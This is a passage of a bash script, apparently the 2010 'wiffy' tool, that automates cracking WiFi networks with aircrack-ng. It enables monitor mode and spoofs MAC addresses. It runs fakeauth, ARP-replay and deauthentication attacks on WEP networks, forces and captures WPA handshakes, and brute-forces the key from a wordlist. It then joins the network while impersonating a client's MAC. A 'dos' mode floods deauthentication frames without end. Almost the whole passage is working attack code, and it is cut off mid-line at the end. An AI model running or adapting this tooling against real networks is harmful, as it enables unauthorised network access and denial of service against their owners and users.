then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action 